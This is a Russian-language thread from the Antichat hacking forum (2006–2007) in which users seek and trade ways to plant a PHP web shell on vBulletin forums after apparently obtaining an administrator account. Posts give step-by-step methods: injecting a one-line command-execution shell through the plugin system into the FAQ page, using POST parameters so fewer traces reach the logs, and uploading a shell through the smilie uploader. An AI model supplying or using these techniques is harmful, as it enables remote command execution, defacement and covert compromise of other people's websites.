ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла аттачем
  #1  
Старый 12.12.2006, 16:03
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


Question Заливка шелла аттачем

Вот возникла проблема. Взял админский акк на булке, захожу в админку, добавляю новый тип прикрепляемого файла - php (phtml тоже пробывал), MIME - ставлю application/octet-stream. Создаю новую тему, прикрепляю мой шелл, при переходе по ссылке выполняются только html теги, ПХП не хочет

Кто нибудь знает можно ли что нибудь тут сделать?
 
Ответить с цитированием

  #2  
Старый 12.12.2006, 16:24
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от bandera  
Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
Почемубы не сдлеать так? Зальещ шелл, а потом просто удалиш это.
 
Ответить с цитированием

  #3  
Старый 12.12.2006, 17:21
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

А лучше system($_POST["cmd"]);

так меньше следов будет в ЛОгах тогда Получим запрос:

www.xz.сom/forumpath/faq.php?
POST: cmd=[command]
 
Ответить с цитированием

  #4  
Старый 12.12.2006, 19:39
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

форум 3 0 1, там вообще ФАКа нет. Меня интересует возможность заливки шела аттачем
 
Ответить с цитированием

  #5  
Старый 12.12.2006, 19:41
Аватар для vmn
vmn
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469

Репутация: 33
По умолчанию

Насколько я знаю, аттачи в булке хранятся в бд...
 
Ответить с цитированием

  #6  
Старый 13.12.2006, 17:49
Аватар для Sharky
Sharky
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
Провел на форуме:
3424739

Репутация: 921


Отправить сообщение для Sharky с помощью ICQ
По умолчанию

Способ заливки шелла в vBulletin 2.*.* и 3.0.*
1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php

Чем тебе не способ... с тебя + к репе
 
Ответить с цитированием

  #7  
Старый 13.12.2006, 21:00
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Sharky, еслиб ты ещё придумал этот способ то я поставил БЫ тебе +. Ты думаешь я не пробывал через смайлы заливать? =)
 
Ответить с цитированием

  #8  
Старый 19.01.2007, 23:46
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Та же история (есть админка надо шелл). Никакого способа не вижу кроме через аттач.

Цитата:
Сообщение от vmn  
Насколько я знаю, аттачи в булке хранятся в бд...
Как обойти? В админке есть какие-то настройки. Что-то типа "Переместить аттачи на винт", но не пробовал пока что бы не привлекать внимание. Может кто знает.
 
Ответить с цитированием

  #9  
Старый 20.01.2007, 00:31
Аватар для SHaDoW[RF]
SHaDoW[RF]
Новичок
Регистрация: 23.12.2006
Сообщений: 20
Провел на форуме:
108824

Репутация: 3
Отправить сообщение для SHaDoW[RF] с помощью ICQ
По умолчанию

Вам шелл нужен что бы дэфэйс поставить?
 
Ответить с цитированием

  #10  
Старый 20.01.2007, 01:40
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Цитата:
Сообщение от SHaDoW[RF]  
Вам шелл нужен что бы дэфэйс поставить?
Не знаю для чего шелл нужен автору темы.

А меня вопрос немного удивил. Что тут ответить: "Нет ну что Вы какой дефейс я из спортивного интереса ведь я белый и пушистый"
или "Ну конечно для дефейса, а для чего же еще"
Вот тут и вопрос, а чем мы тут все занимаемся?
Ясен пень не дефейсить сайты учимся! А вот получить ответ на вопрос "можно ли залить шелл через аттач в указаном форуме" хотелось бы. А для чего, решать каждому в меру своей испорченности. У меня хобби найти ошибку и сказать админу сайта и параллельно узнать что-то новое. Я вот настолько ипорчен.
Извините за длинный пост. Вопрос остаеться в силе. Можно залить или нет? Если да то как.
И вопрос не означеет что я буду тупо сидеть и ждать когда мне все принесут на блюде, я тоже ищу ответы, в том числе и на форуме. Буду рад любой помощи очень мало инфы по vBulletin v3.6.2.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на Ipb 2.1.7 Thrasher Форумы 15 14.01.2007 14:51
Заливка шелла cardons Форумы 8 25.08.2006 17:22
Заливка шелла через БД Tosic Форумы 7 04.07.2006 09:42
Заливка шелла, взлом сайта. Sulf aka Joker Болталка 2 03.07.2006 23:55
Заливка шелла на IPB Lord Nikon Форумы 22 08.01.2006 01:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ